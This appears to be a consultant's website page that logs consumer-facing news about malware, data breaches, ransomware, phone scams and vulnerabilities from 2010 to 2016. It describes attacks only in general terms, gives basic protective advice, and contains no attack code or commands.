CART0669,CART0470

“Get a Personal Trainer for Your Computer!”©

Coach Web Graphic

[THIS PART OF THE PAGE INTENTIONALLY BLANK.  PLEASE SCROLL DOWN....]

2016

  Technology is always a double-edged sword.  Take cars.  With the explosion of new types of computers and chips in recent cars, including the ones which control navigation, offer emergency assistance (a/k/a “telematics”), check tire pressure, automatically park, monitor emissions, employ diagnostics to monitor anti-lock brakes and fuel injection, run radios, permit keyless entry, and allow cell phones to communicate can, conversely, allow hackers to intrude into those systems, usually through Bluetooth or other entry points, where they can take control of all of the computer related systems.  This could become a problem.  Encryption may help, but defense is always a moving target.  2015 UPDATE:  See the IoT definition...

  If you are concerned about malware being transmitted to your home or business computer via USB drive, you can lock down your USB ports using USB Security Suite from Dynamikode, which is easy and works with all Windows operating systems, including Win 8.

  It was only a matter of time:  Ransomware has come to your smartphone.  Malware called Android.Fakedefender pretends to be antivirus software while locking up your smart phone until you pay the “registration fee”.   Sound familiar?

STILL #1 - BEWARE FAKE ANTIVIRUS SOFTWARE! 2010-2016 studies by Google found 11000 domains hosting fake anti-virus software, accounting for 50% of all malware delivered via internet advertising. It’s very tricky, because its developers have made it so that you cannot go to any websites that would provide help in removing it.  For example, while you might be able to go to eBay or Yahoo, you cannot go to Symantec or bleepingcomputer.com, or start from Safe Mode, or run any .exe commands from anti-virus or anti-malware programs. SEE THE EXAMPLES BELOW:

Fake anti-virus
2014 virus trends
fake microsoft message
Windows Performance Advisor

4/1/16:  There isn’t much you can do about this, but be aware that the most current spate of cyberattacks is against Medstar Georgetown U. Hospital, Hollywood Presbytarian Med. Center in L.A., Kentucky-based Methodist Hospital and two southern California hospitals of Prime Healthcare, were all attacked with ransomware demands in March, 2016.  Hospitals aren’t the only ones attacked, but because they are only recently instituting medical records, are behind the security curve and therefore more vulnerable.

6/15/16:  The FBI’s “IC3” (see Associations) announced that th scourge it calls the “BEC” [Business E-mail Compromise] continues to rack up over $3 billion inlosses so far.  The scam is typically carried out by compromising legitimate business e-mail accounts (often those of business executives, book keeping or auditing) through social engineering of intrusion to conduct unauthorized transfers of funds.

2015

12/31/15:  By now, almost everyone is protected from bulk spam or spam from known purveyors, so spammers have had to change their tactics to what researchers call “snowshoe”  or “artisinal” spam, that is, spam e-mails sent from small unknown ISPs and servers which don’t have the resources of Amazon and the others to ferret out the bad stuff, in small batches, more carefully crafted to the recipients.  They look much more authentic and therefore get past users’ filters and into the inboxes.  Mail looks like its from Apple, for example, but it’s not.

10/1/15:  The “Secret Sister Hoax” started popping up on Facebook this month, promising a wealth of gifts to anyone who passes along a Facebook post or email as instructed.  But in reality it’s a chain letter and a pyramid scheme.  But it’s illegal and mathematically impossible, so don’t do it.

10/1/15:  As soon as the Win10 upgrade came out, so did the cryptoware scams from the Russians.  Click HERE for more....

7/29/15:  Stagefright attacks Android phones via text or MMS with a phony audio file which exploits a weakness in Android’s multimedia preview function to deliver malware once an MP3 or MP4 file is previewed or opened..

7/9/15:  If you haven’t been reading the news lately, the U.S. government announced that the Office of Personnel Management (the agency that vets and keeps track of all federal employees) was hacked to the tune of some 20 million names and their associated personal data.  If you underwent a federal background check in year 2000 or later, expect that someone, probably the Chinese, have your information.  Check with OPM, which claims to be offering a “comprehensive suite of monitoring and protection services to those impacted”.

7/10/15:  We all know that most security software today operates much like a fire alarm system.  They sound when there’s smoke or fire and then someone calls the fire department to fix the problem that’s already there.  Something has to change.  DARPA has created a competition to develop a new generation of software which will find the cracks in computer software and systems and patch them before they are hacked.  This could take years and might not ever be realized, but it’s a start.

1/31/15:  While there legitimate products named SafeSearch, the virus of that name isn’t one of them.  This browser hijacker and malware generally comes with free downloads when you’re not looking.  And it’s impossible to get off, even if you know what you’re not paying attention.  You think it’s removed and then, poof!, it shows up a little later.  It takes a lot of steps and the right timing to get this one off, at least for now.

2014

  12/18/14 - Microsoft filed a lawsuit against an alleged tech support company based in L.A., Consumer Focus Services, which operates under such names as Omni Tech Support, FixNow and Techsupport Pro, that have been perpetrating technical support scams on Microsoft customers.  This, in addition to the lawsuits filed last year by the FTC (and other international organizations) against 14 corporate and 17 individual telephone scareware scammers (mostly based in India) that claim to be “representatives” of Microsoft, Dell or the like, telling you that there’s something wrong with your computer and asking permission to check it, then loading malware that infects your computer and charging you for its removal.  Many of these cases have settled out, or maybe they’re just moving to other countries like Russia, where they may enjoy safe haven.  The fines paid, though,  dwarf the $1.5 billion in damages Microsoft claims were lost last year alone.  While this might at least cause a slowdown to these types of attacks, we’re still receiving quite a few calls each month about this, and several clients have fallen for this ruse, infecting their computers.  Click HERE for the Microsoft blog and video about this scam.  So be vigilant - if you receive a call from Microsoft (which never calls anyone), just hang up.

12/31/14:  Click HERE for a discussion of password and intrusion vulnerabilities and how to protect yourself from them.

11/23/14:  Symantec reports a spying bug named Regin has been used for six years to capture screenshots, steal passwords and recover deleted files.  Based on its complexity, Symantec says it was probably created by a nation state for purposes of cyber espionage.  It has hacked computers in Russia, Saudi Arabia and Ireland and covers its tracks after doing so.  Unlike Stuxnet, which was designed to damage equipment, Regin’s purpose is to collect information.

11/10/14:  Thousands of Apple iOS devices were hit with the Wirelurker malware, delivered through a Chinese third-party app provider that was delivering pirated programs.  It installed itself as a system component which grabbed private data such as device serial numbers, iTunes info, phone numbers, etc. for malicious purposes.  Shortly after its discovery, Apple revoked security certificates and blocked the apps from launching.  Click HERE for software to detect if you have Wirelurker.  Wirelurker was noteworthy because it is only the second time in Apple history that malware has targeted iOS devices via USB and the first that has created malicious apps or infected existing iOS ones.

10/16/14:  Today’s security vulnerability is Poodle, which stands for Padding Oracle on Downloaded Legacy Encryption.  It’s found on older web encryption technology, SSL 3.0, which should be disabled for the time being if it’s on your Windows operating system (see browser settings), although some business sites may not work correctly.  SSL has been mostly superceded by TLS on more modern computers. It requires a physical location and active connection before it can be used.  But Poodle compromises the SSL protocol by forcing the browser connection to downgrade its TLS connection to SSL 3.0, which allows leaks of cookie information and possible disclosure of sensitive personal information.

 10/1/14:  It’s been revealed that hackers had infiltrated seven of the largest U.S. banks, using sophisticated malware to invade computer systems and manipulate records.  The worst, JPMorgan/Chase revealed that this summer, cybercriminals gathered information on more than 80 million customers in a massive hack.  While the hackers didn’t get any account information (account numbers, social security numbers, birth dates or IDs), they can still use the stolen e-mail addresses and other information by selling them to spammers.  It was perpetrated using Shellshock, a loophole that infiltrates the Bash software (see Linux for more) in Linux, Unix and Apple OS X systems via insecure Wi-Fi networks and web servers.  This is primarily an enterprise problem, much less so for consumers, although it may cause problems with external drives, phones and other devices that use Linux.

 9/8/14: Here we go again.  Home Depot reported possibly the largest debit and credit card hack yet, some 56 million of them.  It occurred between April, 2014 and 9/2/14 and Home Depot doesn’t yet know its full extent, i.e. if it’s only Track 1 and 2 data (customer’s name, card number and expiration date) or PIN number.  The malware for the hack appears to be a variant of the Target attack, but it ws possible only because of HD’s lax security.

 

>>>>Other countries have it much worse.  You might not have heard of this, but 40% of the S. Korean population (about 20 million citizens) had their data stolen, swiped by a worker at the Korea Credit Bureau.

 6/30/14:  Symantec has uncovered the compromise of more than 1,000 energy companies (grid operators and industrial equipment providers) in 84 countries in North America and Europe.  Since 2011, the Eastern European collective known as Dragonfly, has used Backdoor.Oldrea to gather system information and Trojan.Karagany to upload stolen data from organizations that use industrial control systems (“ICSs”) to manage electrical, water, oil, gas and data systems for energy utilities around the world.  The purpose, at this point, appears to be espionage.  Symantec believes that the attacks have all of the hallmarks of a state-sponsored operation, just like the Stuxnet virus in 2010.  It doesn’t, however, effect consumers directly.

 5/21/14:  The victim of a cyberattack, e-Bay asked its 145 million registered users to change their passwords, even though they were encrypted. Even though Paypal is an e-Bay subsidiary, it’s on a separate server, so no need to change that password.

 5/15/14:  The FBI arrested some 90 people after 300 international searches, shutting down the Blackshades creepware that spied on Cassidy Wolf, Miss Teen USA.

heartbleed logo4/10/14:  You might have heard about the Heartbleed exploit.  While it’s a server issue and end users can’t really do much to cure it, it is a pretty big deal, the worst Internet bug ever.  And it’s undetectable.  Chances are, if you use secure sites to get your e-mail, do your online banking or shopping, access social media accounts which require sign-in credentials, you could be at risk, as the bug can steal your encrypted information and use it later to pose as you for their own gain.  The bug affects a flaw in OpenSSL, which is used in thousands of programs that use SSL/TLS protocols, including VN appliances, cell phones, copy machines, websites offering secure “https://” connections and other popular services like POP/S and IMAP/S.  Basically, if you are going through the minimum 60% of secure web servers that run Apache, Nginx, Linux, BSD (but not Microsoft), you may have a security problem.  The bug is named “heartbleed” because it involves a common routine OpenSSL feature known as “heartbeat,” which allows one computer to detect a “heartbeat” from another computer to see if it’s available. Once accessed, it can be hacked, stealing supposedly encrypted and safe personal credentials.  This has been going on for about two years.  Most servers are currently being patched to eliminate this vulnerability, but it will take a little time.  And, over all that time, your credentials may have already been stolen.  For more information, go to Heartbleed.com.  What can you do?  Other than change your passwords [but not until the server is patched], very little. [Click HERE for an updated CNN list of sites which do and do not require updated passwords.]   However, if a website recommends that you take any specific actions before using their site, listen to them or don’t go there.

 2/25/14:  Apple has issued fixes for Mac, iPhones and iPods which patched a security hold discovered four days earlier which could have exposed users’ sensitive information to hackers.  Left unfixed, hackers could potentially read private communications sent over Apple devices, like e-mails, IMs, social media posts and maybe online banking transactions.  The fix is for the Mavericks and Mountain Lion versions of OS X, as older versions of the OS were not vulnerable.

 1/20/14:  Apparently, the NSA isn’t the only party that can listen to you over your phone or computer.  Google has had a bug since last September that allows hackers to use it’s speech recognition software and microphone to listen in on your conversations hoping for private information or otherwise hacking your phone’s internet with malware.  An Israeli coder says the eavesdropping bug is still vulnerable to this attack.

 1/15/14:  The box at the top of this page discusses hacking your home appliances.  And it’s happened.  Proofpoint Security has uncovered what may be the first wide-scale hack that involved TVs and a refrigerator.  This botnet resulting from a cyberattack on the Internet of Things was created when hackers broke into more than 100,000 everyday devices (including routers, but also media centers, TVs and other internet-connected appliances) between December 23, 2013 and January 6, 2014.  The hackers then used the devices to send more than 750,000 malicious e-mails to enterprises and individuals worldwide.  Context Security has released details about how it was able to hack into the wi-fi network of the LIFX light bulb in 2014, obtaining users’ username and passwords for their home network (since fixed).  But how many more vulnerabilities are out there??  While the IoT may be taking off exponentially and providing lots of convenience, the down-side is that it has lots of vulnerabilities.

2013

12/1/2013:  Computer running slow?  It could be mining Bitcoins for others.  For years, I’ve been writing about Bitcoins, but things have really taken off this year.  Now, we have Bitcoin malware.  Malwarebytes and other anti-malware providers report that Mutual Public (a/k/a We Build Toolbars or YourFree Proxy) has created a Bitcoin miner known as “jhProtominer” with an associated process known as “monitor.exe” which mines bitcoins without your knowledge.  Technically, you agree to this in the fine print of a software download, but you probably missed it.  The software uses your computer and thousands of others connected into a bot to continuously mine bitcoins for the benefit of an undisclosed server computer and its owner.  This is similar to those programs that allow SETI to use your computer and others to search for extraterrestrial life using a network of home computers, but in that case, you have to call them to opt in, so it’s not malware.

  12/18/13:  The breach which claimed data pilfered from millions of Target credit cards this month has created much concern on the part of 7 million customers and their banks.  At this point, how the breach occurred is merely speculation, although it appears that Target may not have encrypted all of its data and stored it in the clear, not a recommended practice.  UPDATE:  The malicious “memory scraping” software that the hackers used used a technique that parsed the data stored briefly in the memory banks of specific POS devices, capturing the data stored on the card’s magnetic stripe the instant after it was swiped and is still briefly in the system’s memory.  It’s believed that they got in through the accounts of some of the store’s vendor connections.  Here’s what is known:  The thieves, probably from Eastern Europe or Russia, got only the information on the magnetic strip of credit, debit and Target Redcards.  That is, probably the customer’s name (not sure for all cards), the account number, expiration date and the card-present CVV (not the same as the one on the back).  Not the account PIN, not the CVV on the back of the card. See CVV for more about what these numbers mean.  [UPDATE:  Evidently they did get the PINs on debit cards.] If you’re concerned, cancel and reissue each card, or at least change the “account alerts” by the issuer, so you’ll immediately be notified about any unusual spending patterns.  Personally my advice would be that, if you had your debit card hacked, to change it immediately, because debit cards don’t have the protection given credit cards and you could lose everything in your checking account. UPDATE: In February, Krebs Security reported that the breach appears to have begun with a malware-laced e-mail phishing attack sent to employees at [Fazio Mechanical] an HVAC firm that did business with the nationwide retailer.  The company's primary method of detecting malicious software on its internal systems unfortunately was the free version of Malwarebytes Anti-Malware which only works on-demand and isn’t for corporate use anyway. UPDATE: On 4/25/14 Michael’s Arts & Crafts disclosed a similar breach of almost 3 million payment cards.  UPDATE:  It just never stops: In August, 2014, it was reported that Russian hackers compromised 1.2 billion user names and passwords, stolen from over 420,000 websites from companies large and small.

 12/30/13:  Right on the heels of the Target data theft (below) came the Snapchat theft.  The names and telephone numbers (required for registration) for Snapchat members have been hacked and posted on snapchatdb.info as a database.  This may have been done to demonstrate the inherent insecurity of the site and Snapchat’s failure to fix a known vulnerability, we’re not sure.  Also, the breaches of several other department stores, including Neiman-Marcus and at least three others which was breached in July but didn’t notice it until December, 2013!

  11/13:  Apparently, you’re not even safe from your own government.  Snowden leaks (see Whistleblowers) revealed that the NSA hacked more than 50,000 U.S. computer networks last year alone under the category of CNE (“Computer Network Exploitation”), by infecting them with malware used to report back and conduct sophisticated spy operations.  For more, see LAWS, RANT.

  4/9/13 - Don’t install Microsoft Win 7 update KB 2823324. It can cause a BSOD after reboot, or at least recurring chkdsk prompts at startup. It may effect computers with Kaspersky Anti-Virus more than others.  Microsoft pulled the update at the end of the week.  It’s the second time this year that a Microsoft Windows update has caused major problems. UPDATE:  Even the patch is not reported to work very well.  Just ignore or roll back this update.

  4/2/13 - One of the largest cyberattacks in history is targeting the Spamhaus Project, a European spam-fighting group. allegedly because it has gone after Cyberbunker, a data-storage company that will host any content except child porn or terrorism.  Because the attack uses more sophisticated techniques than DDoS, and actually targets the Web’s infrastructure, it is causing delays across the Internet for everyone.

  3/13 - Beware of those unrequested password reset e-mails.  If one of your providers was hacked (like Evernote was, earlier this month), you may receive an e-mail telling you to reset your password.  But it’s equally likely that you may receive a fake e-mail created to access your new password.  As always, be sure to go the the actual website for that provider and reset the password from there, and not from some link provided in your e-mail.  It may be a phishing attack.

  3/13 - In early 2013, it was reported that Microsoft, Apple (yes, Apple) and Facebook were victims of hackers.  The Eastern European hacker gang successfully targeted at least 40 companies.  In February, 2013, customer support tool Zendesk reported that it was hacked, exposing the e-mail addresses of users of three of its clients - Tumblr, Pinterest and Twitter.  Shortly after that, on March 4, 2013, Evernote, purveyor of note-taking pens and software, announced that it had been hacked as well, exposing its fifty million users to possible exposure of their e-mail addresses and user names.  The passwords, being robustly encrypted, were probably not at risk.  There’s not much you can do about these hacks, except perhaps to change your password, and watch out for any communications requesting verification of personal or billing information or passwords.  This is one of the downsides to cloud computing.

  2/13 - Beware of the Sality virus.  This true virus, which may not be tracked by your average anti-virus software, can be found and removed using a special tool from Kaspersky.

 1/9/13 - Oracle has advised users to temporarily disable Java software because of security weaknesses creating vulnerabilities.  Oracle will issue a patch on January 15th with 86 fixes to resolve the issues.  UPDATE:  The patch is out, but many reviewers claim that it’s still insufficient.  I’d recommend that, if you don’t use Java, leave it disabled until this issue is fully resolved.

2012

  12/12 - People do fall for ransomware (see above).  According to the NY Times (12/5/12) the scheme makes about $5 million a year, with between 2.9% & 15% of compromised computers taking the bait and forking over up to $400 to clean out the viruses.  And the purveyors have gotten more sophisticated: Following IP addresses allows customized messages in native languages and contain messages purporting to be from the FBI & your country’s law enforcement agencies accusing users of visiting illegal pornography, gambling or piracy sites and demanding fines to unlock the computer and threating criminal charges if the payment isn’t made within 48 hours.  They may even include video from your own webcam.  Some demand that payment be made via a preloaded debit card, making it impossible to cancel the payment or trace it.  Worst of all, payment usually doesn’t result in the computer being unlocked, you still have to hire a pro for that, and it’s not assured that the virus can be removed without damaging the computer’s contents.  Symantec estimates at least 16 major ransomware gangs, mostly in Russia and Eastern Europe.  Infections come from clicking on links, often on pornographic sites, but even web hosting sites like GoDaddy.

  10/1/12 - This week the FTC filed six lawsuits against those telephone scareware scammers that claim to be a “representative” of Microsoft, Dell or the like, telling you that there’s something wrong with your computer and asking permission to check it, loading malware that infects your computer.  This might at least cause a slowdown to these types of attacks.

  Cyberwarfare is becoming a serious concern.  The SEC has issued guidelines for when cyberattacks should be disclosed by public companies, the MILCW (Manual on International Law Applicable to Cyber Warfare) is being written, the FTC “red flag” rules are in effect, etc.  All this indicates that our government is actively considering the protection from cyberattacks which are currently necessary.

  NYC and Microsoft have partnered to produce the Domain Awareness System (“DAS”), software for aggregating law enforcement databases with real-time data feeds, such as closed circuit cameras, license plate readers and radiation detectors to detect and act on patterns from such data.  It’s the first of its kind and, if it works well, there may be more in the war against terrorism and crime.  This isn’t just the stuff of movies any more.

  May, 2012:  Kaspersky labs says that since 2010 malware known as Flame has been operating to collect private data from countries such as Israel and Iran.  It differs from Stuxnet, which targeted nuclear infrastructure in Iran, in that it collects and steals huge amounts of sensitive data.  It was similar to the Duku malware.  It does not delete data from machines, as did the Wiper malware, which targeted machines in western Asia.  It was discovered by Kaspersky Labs in conjunction with the UN’s International Telecommunication Union.  UPDATE:  The August, 2012 cyberattack by the Cutting Sword of Justice against Aramco, Saudi Artabia’s national oil company involved a computer virus known as Shamoon, which shut down the company’s main computer network for more than a week by wiping workstation computer drives clean.  Cyberwarfare has now reached a critical point such that a legal manual on the subject is being prepared [the Tallinn Manual].   Click HERE for more on this subject.

STUXNET (6/2010) {DISCOVERED}

DUQU (10/2011)

FLAME (5/2012)

SIZE:  1.3Mb

0.4 Mb

20 Mb

SPREADS:  VIA USB THUMB DRIVES AND PEER-TO-PEER NETWORKING

INFECTED MICROSOFT WORD FILES, SHARED NETWORK DRIVES

SHARED NETWORK DRIVES, USB THUMB DRIVES, PRINTER DRIVERS

MODIFIES INDUSTRIAL CONTROL SOFTWARE FOR REMOTE INSTRUCTIONS

LOGS KEYSTROKES, CAPTURES SCREENSHOTS, STORES COMPUTER CONFIGURATIONS

RECORDS AUDIO AND SCREENSHOTS, CAPTURES MOBILE DATA, INTERCEPTS NETWORK TRAFFIC, STEALS PASSWORDS

QUIETLY SABATOGED URANIUM CENTRIBUGES AT IRANIAN NUCLEAR FACILITIES

GATHERED INTELLIGENCE FOR USE IN LATER ATTACKS AGAINST INDUSTRIAL CONTROL SYSTEMS

SPIES ON USERS OF TARGETED COMPUTERS; IRAN HAS THE MOST INFECTED SYSTEMS

  January, 2012:  Symantec has announced that if you are using it’s PC Anywhere program for remote access, you should stop.  Apparently the source code, therefore the security, has been stolen by an Indian hacking group and it has been severely compromised.

  If you are using wireless video cameras for security purposes (baby monitor, home or office security), beware that many of these cameras can be easily hacked.   Defeats the purpose, doesn’t it.  For more discussion see FAQ #42

  There have been so many cases where the scammers have claimed to be from Microsoft, that Microsoft has created a web page discussing them.  Click HERE.

 As if you didn’t have enough problems with attachments and programs, now it’s been discovered that Adobe PDF files can be used to trigger a virus.  Many anti-virus programs are failing to find this malware.  It applies to unpatched versions 7.0 of Acrobat and Acrobat Reader running on Internet Explorer 7 on Windows XP SP2 that can trigger an exploit that can seriously infect your computer.  Upgrade to Ver. 8 if at all possible, or else switch to alternative third-party PDF readers such as Foxit Software or CutePDF.  For more information see Microsoft KB 943521.

 For the first time in about 8 years, we’re seeing an increase in Master Boot Record viruses and rootkits.  They’re difficult to locate, even for pros, and even harder to remove, requiring specialized software.

 Symantec tells us (August, 2010) about a rogue anti-virus operation that combines with telemarketing.  A company named Online PC Doctors uses the phone to telemarket users that they convince have infected computers, then offer to remotely connect to the “infected” machine to “clean” the machine for a fee.  This company (www.onlinepcdoctors.com) requests lots of personal information, including a copy of your driver’s license, credit card and personal information, and an explicit approval for them to use the credit card.  They convince users that their computer is infected by having them open the Windows event viewer and, when warnings are listed, claiming that the machine is, indeed, infected.  Not necessarily so.  Don’t get taken by this scam.

  August 3, 2012:  The 2012 Black Hat Security Conference revealed some new and creative hacking: It was demonstrated that, using NFC, code on some Android based smart phones could compromise them by “beaming” malicious files and web pages to them.  Also, the Rakshasa malware, which opens a difficult to detect backdoor in PCs by infecting the BIOS.  Last, an inexpensive hacking tool (“Arduino”) that would allow someone to access hotel locks manufactured by Onity, since they’re protected by only 32-bit encryption.

  July 19, 2012:  A spam botnet named Grum, reportedly responsible for 18% of the world’s spam was shut down today.  While the CnC servers in Panama, Russia and Ukraine were taken down, the spammers did manage to shift some of the spam to other countries, however.

  July, 2012:  Beware the Blackhole drive-by malware.  It is a crimeware kit that allows cybercriminals to deliver malicious code and carry out sophisticated attacks like the kerenel-mode rootkit named ZeroAccess.  Keep your malware patterns current to avoid such intrusions!

  July 14, 2012:  Yahoo gets hacked out of 450,000 passwords and login credentials.  Add this to other recent hacks of Twitter, Facebook [via the Ramnit.C worm] and other social networks and you can see that they’re not all that secure.  At the least:  Use a different password for social networking sites, not the same one you use for everything else (like banking).

  July 9, 2012:  Although it’s unlikely, your computer may catch the DNS changer virus, which could prevent you from accessing the Internet.  Although the FBI arrested the group behind the virus, some 640,000 computers (.01%) may be infected, although that’s not many.  To find out if you may be part of that group, click HERE.  UPDATE:  Of course, the predicted outages fizzled, nothing happened.

  June, 2012:  Most anti-virus and anti-malware software works by trying to stop the bad stuff out before it gets into your computer.  Once it gets through, however, it’s another issue.  But there may be hop:  A company named Bromium is working on software that will open attachments, emails and browser tabs in a temporary compartment that checks the software and, if it finds something bad, dissolves the compartment before it can damage the computer.  It should be out later this year.

  June, 2012:  Text message spam has risen 45 percent in 2011, to 4.5 billion messages.  Generally, most messages appear to originate from the coasts of the U.S. (maybe the spammers live there) and the three most popular states are: New York (beware texts from 347, 201 & 917 area codes), Florida (area code 786) and California (310 area code).

  May, 2012:  DNSChanger virus hits.  It’s the subject of dire warnings across the Internet.  In reality, it is a malware variant of the TDSS/Alurian family of Trojans.  It was one of the largest botnets ever, until it was supposedly taken down in November, 2011 by a joint FBI-Estonian police action code named “Operation Ghost Click”.  But it’s still out there, having infected some four million compuers in the U.S., so beware.  It infected systems by posing as a video codec necessary to download to view videos, then redirects the DNS to sites which sell mostly fake pharmaceuticals, anti-virus products and the like. 

 April, 2012:  Over 600,000 Macs have been infected with the Flashback Trojan virus.  See the Mashable Tech article with fixes at this link.  Either way, don’t forget to install the latest Apple updates to allow Java to fix the vulnerability that allowed the virus in the first place.  You might also consider a security suite like Avast, Sophos or Kaspersky, lock down your administrative privileges, remove or disable Java or Flash unless required and reinforcing your passwords.

  April, 2012:  Kaspersky says that malicious threats targeting mobile devices have significantly increased - 2011 saw six times the threats of 2010.  The Android O/S led the pack.  SMS trojans posed the greatest threat, followed by backdoors and then spyware.  On the bright side, there was a 50% decrease in spam, 50% decrease in cross-site scripting and 30% decrease in exploit code.

2011

  November, 2011:  Internet security firms have reported that the Duqu Trojan virus is a zero-day exploit of a previously unknown vulnerability embedded in Microsoft Word files.  The virus has infected a total of eight countries, including Iran, India, France and Ukraine, but not yet the U.S.  It seems to target and scan internal corporate systems to gather information, reporting back to an as yet unknown source.  It doesn’t look like a problem for most residential surfers, although Microsoft is working on a patch.

  October, 2011:  If you’ve ever wondered whether some of the spam you receive is the result of your friends on Facebook, Norton now offers a tool called Norton Safe Web, which scans your web browser to see if any infected links come from your Facebook account. If you’re an active Facebook user, this may interest you.

  September, 2011:  According to the NY Times (9/29/11), Heidi Klum is this year’s most dangerous celebrity - to search for on the Web at least - according to McAfee Security.  Clicking on links promising sexy pictures of her comes with a nearly one-in-10 chance of contracting a bad case of malware.

  August, 2011:  The Morto worm, which targets Windows computers by exploiting poorly chosen passwords through Remote Desktop Protocol (“RDP”) has arrived and, if it gets into your network, it can clog the network.  But it’s not much of a concern if your anti-virus software is kept current.

  July, 2011:  Recent events (the U.K. News of the World scandal) have prompted people to wonder if they’re vulnerable to “phone hacking.”  Actually, this is a misnomer, as what is actually involved is simply illicit access to voicemail messages, usually because the phone’s user has failed to change the default PIN for voicemail access (e.g. “password” or “admin”).  If you haven’t changed the default issued with your voicemail account, someone could dial the carrier’s access number, enter the default PIN and listen to your messages.  The answer:  Set your personal PIN.

  July, 2011:  By now, you should realize that Firefox automatically updates itself.  So, if you receive an e-mail allegedly from Mozilla asking you to update, don’t click on it.  It does download Mozilla.  But it is also a Trojan Horse known as Troj/PWS-BSF which can steal passwords.

  July, 2011:  Those spammers sure don’t waste any time.  In the same week that Google+ was introduced, they sent out bogus Google+ invitations that were actually online pharmacy come-ons.

  More than 4 million Windows PCs have been infected since March, 2011 by a botnet known as “TDL.”  The boot sector virus, now in its fourth version, is close to indestructible, according to Kaspersky Labs, and spreads via web sites, particularly those that let people store video and image files.  

  June, 2011:  Link to the Mac page to read about the Mac Defender virus and other security updates for Macs. Also, the possible malware infections you can subject yourself to if you use the jailbreakme website information.

 Guardian Analytics reports that about 75% of SMBs in the U.S. experienced online fraud and/or bank account takeover in the 12 months preceeding April, 2011.  Banks didn’t detect the fraud in 78% of the cases.  Businesses suffered monetary losses 60% percent of the time, the bank 37% of the time.

 Microsoft IE9s “Do Not Track” feature doesn’t have any teeth.  When you enable this feature in your browser (same for Firefox 4; not available in Chrome and Safari), it’s only a request, indicated by an electronic flag that is visible to web operators.  But they aren’t obligated by law or otherwise to honor such requests.  In fact, there may be as yet no technological way to do so.  For now, just stick with deleting cookies and search histories or using anonymous browsers.

 March, 2011:  Good news!  Led by Microsoft, Pfizer and FireEye, the Rustock botnet, which pumped out 44 billion pieces of spam (mostly masquerading as Canadian pharmacies, actually located in India and elsewhere) is no more, at least for now.  The amount of spam worldwide actually dropped by 47.5!

 May, 2011:  hacker groups LulzSec and Anonomyous invaded police departments, the CIA, PBS, the U.S. Senate, Fox and other sites.  After 50 days, they retired.

 March  2011:  Recently, a malware known as LizaMoon has hijacked links on literally millions of websites, including some of the normally safe ones such as iTunes and Google.  Like Anti-Virus 2011, LizaMoon uses rogue-AV scare tactics to trick you into running bogus cleanup tools on your PC, usually to no avail.  You can avoid this by simply not clicking on the come-on.

 2011 Virus Stats:  PandaLabs reports that Malware increased 26% during the beginning of 2011, and 16% over the end of 2010.  70% were Trojans. Similarly IBM’s 2010 Trend & Risk Report found that almost half of vulnerabilities were web application issues, caused by cross-site scripting and SQL injection malware (see SPYWARE page).

2010

 ZeuS (a/k/a Trojan.Zbot) just won’t go away.  One of the most damaging and persistent malicious code, ZeuS runs below the radar as a rootkit, where it gathers account numbers and passwords then sends them off to data dump dropzones over the Web.  What makes ZeuS more damaging is its ability to evolve, infecting machines through a variety of sources, focusing on differing attack vectors, modifying web pages, even attacking smart phones.  It’s difficult to protect against and remove.  And it’s not going away any time soon; in fact it’s for sale on the Internet.

 It’s a new year and the security summaries for 2010 have been published, along with the vulnerability predictions for 2011.  No great surprises here. Cisco reports that, while mass attacks are reduced, targeted attacks like phishing, identity theft and malware, are on the rise, as the payoff is greater.  Summarized:  As more people use mobile devices and bring them into the workplace, they will come to the forefront of security.  Social media attacks will become more common and more complex, as e-mail and ordinary virus attacks decline.  Rootkits and MBR viruses will increase, however.  McAfee and Trend Micro say their data shows that Google’s Android platform as well as Apple’s iPhone and Mac OS, and geolocation service FourSquare and URL-shortening services used by Twitter and FaceBook are all in cybercriminals crosshairs. Net-Witness and Websense also predict that botnets are now roaring back in the new year after a downturn in the final quarter of 2010, and that there will be a botnet “cyberware” which will most likely be won by the Zeus botnet (over competitors Kneber, Rustock and Waladac) which will be incrementally upgraded with opt-in and JavaScript cross-site.  Finally, as the result of the Wikileaks controversy, there may also be an increase in politically motivated attacks.

 2010 Virus Stats:  4 Qtr. 2010 1.2 million web sites were affected by malware according to Dasient Internet Security, double that of Q4 2009.    Most were drive-by downloads (see Spyware), surpassing older forms of incursion such as spam and e-mail attachments.  Maybe the arrest of Russian Oleg Nikolaenko (a/k/a The King of Spam), author of the Mega-D botnet which sent 10 million spam e-mail messages a day, has had some (temporary) effect.

 The Microsoft security scammers are back again.  If you receive an e-mail allegedly from the “Microsoft Security Team” urging you to update your Windows, don’t fall for it.  The subject line may say “Update Your Windows” and it may be from Steve Lipner (who really is with Microsoft’s security team), and it may attach a file (KB453396-ENU.zip).  Trash this mail, as it will infect your computer.  And remember - Microsoft NEVER sends e-mails with security updates.

 Some viruses have actually been unleashed by hackers dropping a USB drive in a parking lot which became plugged in by a (naturally) curious person.  The infamous Stuxnet worm in mid-2010 was also most likely propagated through USB flash drives.  It is likely that in the future this vector for malware delivery may increase.  One way to make it less likely to do its damage is to disable the “autorun.inf” file in Windows.  That’s the file that automatically loads programs or searches for drivers once a disk or device is inserted into the computer.  If it runs automatically, this means that if the media contains the virus, it may automatically load; Also, if Windows automatically must search on the web for a driver for the device, it may go to a site which will download a purposely infected driver.  To disable the driver search feature in Windows (which would still allow you to search for a missing driver, although manually), here’s how: In Windows XP, Start>Control Panel>System>Hardware Tab>Drivers>Windows Update, then uncheck “Never Search Windows Update for Drivers”.  In XP and Win7, Start>type “change device installation settings” in the search box>in the pop-up window, under “Do you want Windows to download driver software...” select “No, let me choose what to do,”  then choose the option “Never install driver software from Windows Update”.  Disabling the autorun feature is more complex, involving editing of a registry key (see HERE).

 Sophos advises awareness of the Windows Shortcut Exploit (also known as CPLINK), which is a “zero day vulnerability” in all versions of Windows which allows a Windows shortcut link (known as a .lnk file) to run a malicious DLL file.  The exploit runs when you open a device or network share and does NOT require anything for the exploit to run, as the .lnk file can be embedded in a web page or even in a document.

 You may notice you receive less “Nigerian scam” e-mails.  Okpako Mike Diamreyan of Nigeria has been convicted and sentenced to 12 years in prison after sending fraudulent e-mails offering victims money for moving cash to the U.S.  He made more than $1.3 million from 67 victims between 2004 and 2009. See the Rant page of this site - I can’t believe people still fall for this.

 Worms are back.  No, not the old, simple “I Love You” attachment worm, but the new, improved XSS (“cross-site scripting”) worms that aren’t caught by traditional anti-virus programs.  [See Spyware for deeper discussion.]  To be completely protected, you should turn off JavaScript for new sites, unless absolutely necessary and, of course, never click on links in an e-mail or the web, unless you’re absolutely sure they’re safe.  Also, keep current with your browser updates, they provide some degree of protection.

